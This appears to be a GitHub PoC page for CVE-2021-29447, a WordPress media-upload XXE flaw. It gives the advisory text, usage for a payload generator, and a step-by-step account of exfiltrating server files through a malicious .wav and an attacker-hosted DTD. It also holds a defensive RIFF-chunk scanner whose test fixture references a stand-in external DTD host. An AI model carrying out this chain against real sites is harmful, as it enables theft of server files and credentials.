
CVE-2021-29447 PoC — WordPress Authenticated XXE attack when installation is running PHP 8

Source
Associated Vulnerability
Title: WordPress Authenticated XXE attack when installation is running PHP 8 (CVE-2021-29447)
Description: WordPress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires the WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
Readme
# CVE-2021-29447-POC

## About

This script automates the steps required to exploit [CVE-2021-29447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447) in the media upload functionality of WordPress and use it to extract files via an XXE.

## Usage

```
./generate_payloads.py --help
usage: generate_payloads.py [-h] [--local-ip LOCAL_IP] [--local-port LOCAL_PORT] [--media-payload MEDIA_PAYLOAD] [--dtd-payload DTD_PAYLOAD]
                            [--files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]]

CVE-2021-29447 payload generator

options:
  -h, --help            show this help message and exit
  --local-ip LOCAL_IP   Local machine IP address
  --local-port LOCAL_PORT
                        Local machine port which will run an HTTP server to receive the exfiltrated files
  --media-payload MEDIA_PAYLOAD
                        Name of the .wav file containing the exploit to be generated
  --dtd-payload DTD_PAYLOAD
                        Name of the .dtd file containing the exploit to be generated
  --files-to-fetch FILES_TO_FETCH [FILES_TO_FETCH ...]
```

The script does the following:

- First step: It generates a `.wav` payload that you need to upload to the target server. You can use `--media-payload` to pass its name.
- Second step: It generates a DTD document which will be served via a local HTTP server. You can use `--dtd-payload` to pass its name. This file will contain the absolute paths of the files you would like to extract from the target machine; you can specify a comma-separated list of files via `--files-to-fetch`.
- Third step: It runs a simple Python HTTP server to which the `.wav` payload connects back, both to fetch the second part of the payload (the DTD document) and to send back the files fetched from the remote system.
- Fourth step: If all of the files you specified exist on the remote filesystem, they are sent back to the HTTP server in Base64-encoded form; the script then decodes them and saves them to your current working directory.
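
From the defender's side, the artifact this chain depends on is a WAV upload whose metadata chunk carries XML with an external DTD reference. The following scanner, added here as an example and not part of the PoC repository, walks the RIFF chunks of an uploaded file and flags any non-audio chunk containing a `DOCTYPE` with an external identifier or an `ENTITY` declaration; the sample files it checks are constructed in the script (the `iXML` chunk name in the suspect sample is only the fixture's choice; the check itself does not depend on the chunk name).

```python
import re
import struct

# Markers of XML that a vulnerable parser would resolve: a DOCTYPE with an
# external identifier (SYSTEM/PUBLIC) or any ENTITY declaration.
XXE_MARKERS = re.compile(rb"<!DOCTYPE[^>]*\b(SYSTEM|PUBLIC)\b|<!ENTITY\b", re.IGNORECASE)


def iter_riff_chunks(data: bytes):
    """Yield (fourcc, payload) for every top-level chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunks are word-aligned: pad byte after odd sizes


def find_xml_dtd_chunks(data: bytes) -> list[str]:
    """Return the fourcc of each chunk carrying DOCTYPE/ENTITY markup.

    'fmt ' and 'data' hold format fields and raw samples and are skipped;
    every other chunk (metadata, LIST, iXML, ...) is inspected.
    """
    hits = []
    for fourcc, payload in iter_riff_chunks(data):
        if fourcc in (b"fmt ", b"data"):
            continue
        if XXE_MARKERS.search(payload):
            hits.append(fourcc.decode("ascii", "replace"))
    return hits


def build_wav(extra_chunks: list[tuple[bytes, bytes]]) -> bytes:
    """Assemble a tiny 8-bit mono PCM WAV plus extra chunks (test fixture only)."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)
    body = b""
    for fourcc, payload in [(b"fmt ", fmt), (b"data", b"\x80" * 4)] + extra_chunks:
        body += fourcc + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


# Constructed samples, not real uploads: one benign LIST/INFO chunk, one chunk
# with an external DTD reference (documentation address 198.51.100.7).
CLEAN_WAV = build_wav([(b"LIST", b"INFOISFT\x05\x00\x00\x00Lavf\x00")])
SUSPECT_WAV = build_wav([(b"iXML", b'<?xml version="1.0"?><!DOCTYPE r SYSTEM "http://198.51.100.7:8000/x.dtd"><r/>')])

if __name__ == "__main__":
    print("clean  :", find_xml_dtd_chunks(CLEAN_WAV))    # []
    print("suspect:", find_xml_dtd_chunks(SUSPECT_WAV))  # ['iXML']
```

Run it against files in the uploads directory of a site that has not yet moved to 5.7.1; a hit does not prove a compromise, but it is a file that should never have been accepted as audio.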

## Disclaimer

This software has been created purely for the purposes of research and for the development of effective mitigation techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

```
[4.0K] /data/pocs/cc7ca7730fe0ad648adc56849b2b8ef83679f0ec
├── [ 699] colored_formatter.py
├── [5.9K] generate_payloads.py
└── [2.3K] README.md

0 directories, 3 files
```